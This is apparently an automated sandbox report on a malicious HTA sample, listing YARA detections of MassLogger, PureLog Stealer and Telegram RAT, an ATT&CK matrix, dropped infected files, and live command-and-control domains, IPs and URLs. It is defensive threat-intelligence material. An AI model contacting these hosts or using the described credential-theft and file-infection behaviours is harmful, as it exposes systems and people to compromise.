                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: x.exeBinary or memory string: WIN_81
                  Source: x.exeBinary or memory string: WIN_XP
                  Source: x.exeBinary or memory string: WIN_XPe
                  Source: x.exeBinary or memory string: WIN_VISTA
                  Source: x.exeBinary or memory string: WIN_7
                  Source: x.exeBinary or memory string: WIN_8
                  Source: x.exe, 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
                  Source: Yara matchFile source: 15.2.RegSvcs.exe.2d30ee8.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.RegSvcs.exe.3ee6458.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.RegSvcs.exe.2a41f6e.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.RegSvcs.exe.2d30ee8.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.RegSvcs.exe.3f0f990.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.RegSvcs.exe.2a41f6e.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.RegSvcs.exe.5360000.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.RegSvcs.exe.3ee6458.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.RegSvcs.exe.2a41086.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.RegSvcs.exe.5360000.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.RegSvcs.exe.2d30000.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.RegSvcs.exe.2d30000.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.RegSvcs.exe.3f0f990.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.RegSvcs.exe.3ee5570.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.RegSvcs.exe.2a41086.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000005.00000002.2946618374.0000000002B60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.2945957784.0000000003070000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.2932151290.0000000002A01000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.2966793878.0000000003EE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.2971534610.0000000005360000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.2944400846.0000000002D30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

                  Remote Access Functionality

                  barindex
                  Yara detected MassLogger RAT
                  Source: Yara matchFile source: 15.2.RegSvcs.exe.2d30ee8.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.RegSvcs.exe.3ee6458.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.RegSvcs.exe.2a41f6e.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.RegSvcs.exe.2d30ee8.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.RegSvcs.exe.3f0f990.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.RegSvcs.exe.2a41f6e.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.RegSvcs.exe.5360000.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.RegSvcs.exe.3ee6458.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.RegSvcs.exe.2a41086.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.RegSvcs.exe.5360000.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.RegSvcs.exe.2d30000.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.RegSvcs.exe.2d30000.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.RegSvcs.exe.3f0f990.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.RegSvcs.exe.3ee5570.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.RegSvcs.exe.2a41086.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000F.00000002.2932151290.0000000002A01000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.2966793878.0000000003EE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.2971534610.0000000005360000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.2944400846.0000000002D30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Yara detected PureLog Stealer
                  Source: Yara matchFile source: 15.2.RegSvcs.exe.2d30ee8.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.RegSvcs.exe.3ee6458.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.RegSvcs.exe.2a41f6e.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.RegSvcs.exe.2d30ee8.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.RegSvcs.exe.3f0f990.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.RegSvcs.exe.2a41f6e.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.RegSvcs.exe.5360000.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.RegSvcs.exe.3ee6458.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.RegSvcs.exe.2a41086.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.RegSvcs.exe.5360000.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.RegSvcs.exe.2d30000.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.RegSvcs.exe.2d30000.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.RegSvcs.exe.3f0f990.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.RegSvcs.exe.3ee5570.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.RegSvcs.exe.2a41086.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000F.00000002.2932151290.0000000002A01000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.2966793878.0000000003EE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.2971534610.0000000005360000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.2944400846.0000000002D30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Yara detected Telegram RAT
                  Source: Yara matchFile source: 15.2.RegSvcs.exe.2d30ee8.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.RegSvcs.exe.3ee6458.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.RegSvcs.exe.2a41f6e.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.RegSvcs.exe.2d30ee8.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.RegSvcs.exe.3f0f990.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.RegSvcs.exe.2a41f6e.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.RegSvcs.exe.5360000.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.RegSvcs.exe.3ee6458.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.RegSvcs.exe.2a41086.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.RegSvcs.exe.5360000.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.RegSvcs.exe.2d30000.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.RegSvcs.exe.2d30000.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.RegSvcs.exe.3f0f990.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.RegSvcs.exe.3ee5570.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.RegSvcs.exe.2a41086.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000F.00000002.2932151290.0000000002A01000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.2966793878.0000000003EE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.2971534610.0000000005360000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.2944400846.0000000002D30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_00476283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,1_2_00476283
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_00476747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,1_2_00476747

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity Information111
                  Scripting                  		2
                  Valid Accounts                  		3
                  Native API                  		111
                  Scripting                  		1
                  Exploitation for Privilege Escalation                  		11
                  Disable or Modify Tools                  		1
                  OS Credential Dumping                  		2
                  System Time Discovery                  		1
                  Taint Shared Content                  		1
                  Archive Collected Data                  		2
                  Ingress Tool Transfer                  		Exfiltration Over Other Network Medium1
                  System Shutdown/Reboot
                  CredentialsDomainsDefault Accounts2
                  Service Execution                  		2
                  LSASS Driver                  		1
                  Abuse Elevation Control Mechanism                  		1
                  Deobfuscate/Decode Files or Information                  		21
                  Input Capture                  		1
                  Account Discovery                  		Remote Desktop Protocol1
                  Data from Local System                  		11
                  Encrypted Channel                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAt1
                  DLL Side-Loading                  		2
                  LSASS Driver                  		1
                  Abuse Elevation Control Mechanism                  		Security Account Manager3
                  File and Directory Discovery                  		SMB/Windows Admin Shares11
                  Email Collection                  		3
                  Non-Application Layer Protocol                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCron2
                  Valid Accounts                  		1
                  DLL Side-Loading                  		4
                  Obfuscated Files or Information                  		NTDS138
                  System Information Discovery                  		Distributed Component Object Model21
                  Input Capture                  		14
                  Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchd1
                  Windows Service                  		2
                  Valid Accounts                  		1
                  Direct Volume Access                  		LSA Secrets231
                  Security Software Discovery                  		SSH3
                  Clipboard Data                  		Fallback ChannelsScheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled Task2
                  Registry Run Keys / Startup Folder                  		21
                  Access Token Manipulation                  		1
                  Software Packing                  		Cached Domain Credentials11
                  Virtualization/Sandbox Evasion                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items1
                  Windows Service                  		1
                  Timestomp                  		DCSync2
                  Process Discovery                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/Job212
                  Process Injection                  		1
                  DLL Side-Loading                  		Proc Filesystem1
                  Application Window Discovery                  		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAt2
                  Registry Run Keys / Startup Folder                  		222
                  Masquerading                  		/etc/passwd and /etc/shadow1
                  System Owner/User Discovery                  		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron2
                  Valid Accounts                  		Network Sniffing1
                  System Network Configuration Discovery                  		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                  Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd11
                  Virtualization/Sandbox Evasion                  		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                  Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task21
                  Access Token Manipulation                  		KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
                  Determine Physical LocationsVirtual Private ServerCompromise Hardware Supply ChainUnix ShellSystemd TimersSystemd Timers212
                  Process Injection                  		GUI Input CapturePermission Groups DiscoveryReplication Through Removable MediaEmail CollectionProxyExfiltration over USBNetwork Denial of Service

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1566438 Sample: Ziraat_Swift.hta Startdate: 02/12/2024 Architecture: WINDOWS Score: 100 69 reallyfreegeoip.org 2->69 71 ww7.przvgke.biz 2->71 73 24 other IPs or domains 2->73 87 Multi AV Scanner detection for domain / URL 2->87 89 Suricata IDS alerts for network traffic 2->89 91 Found malware configuration 2->91 95 14 other signatures 2->95 9 alg.exe 1 2->9         started        14 mshta.exe 2 2->14         started        16 elevation_service.exe 2->16         started        18 14 other processes 2->18 signatures3 93 Tries to detect the country of the analysis system (by using the IP) 69->93 process4 dnsIp5 81 ww99.fwiwk.biz 72.52.179.174, 49740, 49902, 80 LIQUIDWEBUS United States 9->81 83 lpuegx.biz 82.112.184.197, 49753, 49754, 49790 FIRST_LINE-SP_FOR_B2B_CUSTOMERSUPSTREAMSRU Russian Federation 9->83 85 7 other IPs or domains 9->85 49 C:\Program Files\...\updater.exe, PE32+ 9->49 dropped 51 C:\Program Files\...\private_browsing.exe, PE32+ 9->51 dropped 53 C:\Program Files\...\plugin-container.exe, PE32+ 9->53 dropped 63 120 other malicious files 9->63 dropped 109 Creates files in the system32 config directory 9->109 111 Writes data at the end of the disk (often used by bootkits to hide malicious code) 9->111 113 Drops executable to a common third party application directory 9->113 55 C:\Users\user\AppData\Local\Temp\x.exe, PE32 14->55 dropped 20 x.exe 5 14->20         started        57 C:\Windows\System32\snmptrap.exe, PE32+ 16->57 dropped 59 C:\Windows\System32\msiexec.exe, PE32+ 16->59 dropped 61 C:\Windows\System32\msdtc.exe, PE32+ 16->61 dropped 65 8 other malicious files 16->65 dropped 115 Infects executable files (exe, dll, sys, html) 16->115 117 Found direct / indirect Syscall (likely to bypass EDR) 16->117 119 Windows Scripting host queries suspicious COM object (likely to drop second stage) 18->119 121 Contains functionality to behave differently if execute on a Russian/Kazak computer 18->121 25 differences.exe 18->25         started        file6 signatures7 process8 dnsIp9 79 cvgrf.biz 54.244.188.177, 49730, 49731, 49732 AMAZON-02US United States 20->79 41 C:\Windows\System32\alg.exe, PE32+ 20->41 dropped 43 C:\Windows\System32\AppVClient.exe, PE32+ 20->43 dropped 45 C:\Users\user\AppData\...\differences.exe, PE32 20->45 dropped 47 4 other malicious files 20->47 dropped 101 Binary is likely a compiled AutoIt script file 20->101 103 Writes data at the end of the disk (often used by bootkits to hide malicious code) 20->103 105 Drops executable to a common third party application directory 20->105 107 Infects executable files (exe, dll, sys, html) 20->107 27 differences.exe 2 20->27         started        31 differences.exe 25->31         started        33 RegSvcs.exe 25->33         started        file10 signatures11 process12 file13 67 C:\Users\user\AppData\...\differences.vbs, data 27->67 dropped 123 Drops VBS files to the startup folder 27->123 125 Writes to foreign memory regions 27->125 127 Maps a DLL or memory area into another process 27->127 129 Switches to a custom stack to bypass stack traces 27->129 35 RegSvcs.exe 15 2 27->35         started        39 RegSvcs.exe 31->39         started        signatures14 process15 dnsIp16 75 checkip.dyndns.com 193.122.130.0, 49733, 49749, 80 ORACLE-BMC-31898US United States 35->75 77 reallyfreegeoip.org 104.21.67.152, 443, 49736, 49752 CLOUDFLARENETUS United States 35->77 97 Tries to steal Mail credentials (via file / registry access) 39->97 99 Tries to harvest and steal browser information (history, passwords, etc) 39->99 signatures17

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  Ziraat_Swift.hta5%ReversingLabsWin32.Trojan.Generic
                  Ziraat_Swift.hta8%VirustotalBrowse

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Program Files (x86)\AutoIt3\Au3Check.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\AutoIt3\Au3Info.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\AutoIt3\Au3Check.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\AutoIt3\Au3Info.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe100%Joe Sandbox ML

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  SourceDetectionScannerLabelLink
                  ww99.przvgke.biz11%VirustotalBrowse
                  ww99.fwiwk.biz14%VirustotalBrowse
                  ww7.fwiwk.biz15%VirustotalBrowse
                  ww7.przvgke.biz14%VirustotalBrowse

                  URLs

                  SourceDetectionScannerLabelLink
                  http://54.244.188.177:80/irtgqxbqsqyophmbi0%Avira URL Cloudsafe
                  http://44.221.84.105/hwjtljgqnsqgbcs0%Avira URL Cloudsafe
                  http://ww99.przvgke.biz/widfafwxfswriju100%Avira URL Cloudmalware
                  http://ww7.przvgke.biz/widfafwxfswrij?usid=26&utid=9204703590100%Avira URL Cloudmalware
                  http://54.244.188.177/irtgqxbqsqyophmbL0%Avira URL Cloudsafe
                  http://82.112.184.197:80/vtrrtopft0%Avira URL Cloudsafe
                  http://54.244.188.177/lfu0%Avira URL Cloudsafe
                  http://ww99.przvgke.biz/widfafwxfswrij100%Avira URL Cloudmalware
                  http://18.141.10.107:80/r0%Avira URL Cloudsafe
                  http://18.141.10.107/rq0%Avira URL Cloudsafe
                  http://18.141.10.107/q0%Avira URL Cloudsafe
                  http://54.244.188.177/irtgqxbqsqyophmb&0%Avira URL Cloudsafe
                  http://54.244.188.177/lf0%Avira URL Cloudsafe
                  http://82.112.184.197:80/dmksqnbs0%Avira URL Cloudsafe
                  http://18.141.10.107/qs#q0%Avira URL Cloudsafe
                  http://54.244.188.177/3?0%Avira URL Cloudsafe
                  http://ww12.przvgke.biz/jenyp?usid=26&utid=9204704395100%Avira URL Cloudmalware
                  http://54.244.188.177/?q0%Avira URL Cloudsafe
                  http://ww99.przvgke.biz/jenyp100%Avira URL Cloudmalware
                  http://54.244.188.177/7q0%Avira URL Cloudsafe
                  http://44.221.84.105/hwjtljgqnsqgbc0%Avira URL Cloudsafe
                  http://54.244.188.177/irtgqxbqsqyophmb0%Avira URL Cloudsafe
                  http://54.244.188.177/kqP0%Avira URL Cloudsafe
                  http://82.112.184.197/0%Avira URL Cloudsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  przvgke.biz
                  		172.234.222.138
                  		truefalse
                    		high
                    76899.bodis.com
                    		199.59.243.227
                    		truefalse
                      		high
                      ssbzmoy.biz
                      		18.141.10.107
                      		truefalse
                        		high
                        knjghuig.biz
                        		18.141.10.107
                        		truefalse
                          		high
                          vjaxhpbji.biz
                          		82.112.184.197
                          		truefalse
                            		high
                            pywolwnvd.biz
                            		54.244.188.177
                            		truefalse
                              		high
                              reallyfreegeoip.org
                              		104.21.67.152
                              		truefalse
                                		high
                                ifsaia.biz
                                		13.251.16.150
                                		truefalse
                                  		high
                                  checkip.dyndns.com
                                  		193.122.130.0
                                  		truefalse
                                    		high
                                    cvgrf.biz
                                    		54.244.188.177
                                    		truefalse
                                      		high
                                      ww99.przvgke.biz
                                      		72.52.179.174
                                      		truefalseunknown
                                      lpuegx.biz
                                      		82.112.184.197
                                      		truefalse
                                        		high
                                        ww99.fwiwk.biz
                                        		72.52.179.174
                                        		truefalseunknown
                                        saytjshyf.biz
                                        		44.221.84.105
                                        		truefalse
                                          		high
                                          084725.parkingcrew.net
                                          		13.248.148.254
                                          		truefalse
                                            		high
                                            xlfhhhm.biz
                                            		47.129.31.212
                                            		truefalse
                                              		high
                                              fwiwk.biz
                                              		172.234.222.138
                                              		truefalse
                                                		high
                                                vcddkls.biz
                                                		18.141.10.107
                                                		truefalse
                                                  		high
                                                  npukfztj.biz
                                                  		44.221.84.105
                                                  		truefalse
                                                    		high
                                                    ww7.przvgke.biz
                                                    		unknown
                                                    		unknowntrueunknown
                                                    ww7.fwiwk.biz
                                                    		unknown
                                                    		unknowntrueunknown
                                                    zlenh.biz
                                                    		unknown
                                                    		unknownfalse
                                                      		high
                                                      checkip.dyndns.org
                                                      		unknown
                                                      		unknownfalse
                                                        		high
                                                        uhxqin.biz
                                                        		unknown
                                                        		unknownfalse
                                                          		high
                                                          ww12.przvgke.biz
                                                          		unknown
                                                          		unknowntrue
                                                            		unknown
                                                            anpmnmxo.biz
                                                            		unknown
                                                            		unknownfalse
                                                              		high

                                                              Contacted URLs

                                                              NameMaliciousAntivirus DetectionReputation
                                                              http://lpuegx.biz/dmksqnbsfalse
                                                                		high
                                                                http://xlfhhhm.biz/fnbbnvvirqhlfxfalse
                                                                  		high
                                                                  http://ssbzmoy.biz/rfalse
                                                                    		high
                                                                    http://checkip.dyndns.org/false
                                                                      		high
                                                                      http://vjaxhpbji.biz/lhocoojsqrafriiafalse
                                                                        		high
                                                                        http://vcddkls.biz/kffalse
                                                                          		high
                                                                          http://pywolwnvd.biz/aahfalse
